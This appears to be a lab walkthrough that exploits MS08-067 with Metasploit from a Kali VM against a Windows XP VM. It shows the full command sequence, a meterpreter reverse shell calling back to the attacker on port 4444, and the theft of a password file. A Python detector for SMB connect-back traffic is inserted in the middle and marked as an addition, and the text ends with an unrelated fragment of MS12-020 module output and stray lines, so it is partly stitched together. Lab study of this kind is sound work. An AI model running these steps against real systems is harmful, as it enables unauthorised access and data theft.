1. Preparation
- Kali Linux VM:
+ IP: 192.168.1.225
- XP VM:
+ IP: 192.168.1.226
+ Set up a shared folder on the XP machine
There are four main steps.
First, use the exploit, then set the payload (which creates the backdoor).
After that, set LHOST and RHOST.
2. Exploiting the MS08-067 vulnerability from the Kali Linux machine
- Start Metasploit
root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.226    (machine under attack)
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.225    (attacking machine)
msf exploit(ms08_067_netapi) > set target 6
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.225:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (882688 bytes) to 192.168.1.226
[*] Meterpreter session 1 opened (192.168.1.225:4444 -> 192.168.1.226:1045) at 2015-05-29 03:07:05 -0700
meterpreter >
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd C:\\
meterpreter > pwd
C:\
meterpreter > dir
[-] Unknown command: dir.
meterpreter > ls
Listing: C:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100777/rwxrwxrwx  0          fil   2011-06-22 21:45:05 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   2011-06-22 21:45:05 -0700  CONFIG.SYS
40777/rwxrwxrwx   0          dir   2011-06-22 21:51:32 -0700  Documents and Settings
100444/r--r--r--  0          fil   2011-06-22 21:45:05 -0700  IO.SYS
100444/r--r--r--  0          fil   2011-06-22 21:45:05 -0700  MSDOS.SYS
100555/r-xr-xr-x  47564      fil   2004-08-03 14:38:34 -0700  NTDETECT.COM
40555/r-xr-xr-x   0          dir   2011-06-22 21:54:29 -0700  Program Files
40777/rwxrwxrwx   0          dir   2015-05-29 18:22:02 -0700  RECYCLER
40777/rwxrwxrwx   0          dir   2015-05-29 18:22:21 -0700  Shared
40777/rwxrwxrwx   0          dir   2011-06-22 21:50:55 -0700  System Volume Information
40777/rwxrwxrwx   0          dir   2015-05-29 19:06:01 -0700  WINDOWS
100666/rw-rw-rw-  211        fil   2011-06-22 21:41:17 -0700  boot.ini
100444/r--r--r--  250032     fil   2004-08-03 14:59:34 -0700  ntldr
100666/rw-rw-rw-  805306368  fil   2015-05-29 20:32:45 -0700  pagefile.sys
100666/rw-rw-rw-  9          fil   2015-05-29 20:35:48 -0700  password.txt

meterpreter > download password.txt /root/Desktop
[*] downloading: password.txt -> /root/Desktop/password.txt
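
Seen from the defender's side, the session above leaves a recognizable network trace: an inbound SMB connection (TCP 445) to the XP host, followed within seconds by that host connecting back to the same peer on the handler port (4444 here). The Python below is an added example, not part of the original document; the log format, the function names and the 30-second window are assumptions, and the sample records are constructed from the addresses in the transcript.

```python
from datetime import datetime, timedelta

# Constructed connection records (assumed format: "timestamp src:sport -> dst:dport"),
# modelled on the addresses and times shown in the transcript above.
SAMPLE_LOG = """\
2015-05-29T03:06:58 192.168.1.50:51200 -> 192.168.1.226:445
2015-05-29T03:07:03 192.168.1.225:38112 -> 192.168.1.226:445
2015-05-29T03:07:05 192.168.1.226:1045 -> 192.168.1.225:4444
2015-05-29T03:09:40 192.168.1.226:1050 -> 192.168.1.10:80
"""

SMB_PORT = 445
WINDOW = timedelta(seconds=30)  # assumed correlation window


def parse(line):
    """Split one record into (time, src_ip, src_port, dst_ip, dst_port)."""
    ts, src, _arrow, dst = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), sip, int(sport), dip, int(dport)


def find_connect_backs(log_text, window=WINDOW):
    """Flag hosts that receive SMB from a peer and then open a connection
    back to that same peer on a non-SMB port within `window`."""
    last_smb = {}  # (smb_server, smb_client) -> time of most recent inbound SMB
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        t, sip, _sport, dip, dport = parse(line)
        if dport == SMB_PORT:
            last_smb[(dip, sip)] = t
            continue
        seen = last_smb.get((sip, dip))
        if seen is not None and timedelta(0) <= t - seen <= window:
            alerts.append({"host": sip, "peer": dip, "port": dport,
                           "delay_s": (t - seen).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_connect_backs(SAMPLE_LOG):
        print("connect-back after inbound SMB:", alert)
```

Records must be in time order. The ordinary SMB client (192.168.1.50) and the later web request are not flagged, because neither is a connection back to a peer that had just reached the host over SMB.
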
Matching Modules
================

Name                                              Disclosure Date  Rank    Description
----                                              ---------------  ----    -----------
auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS
auxiliary/scanner/rdp/ms12_020_check                                       Remote Desktop Checker
yes
yes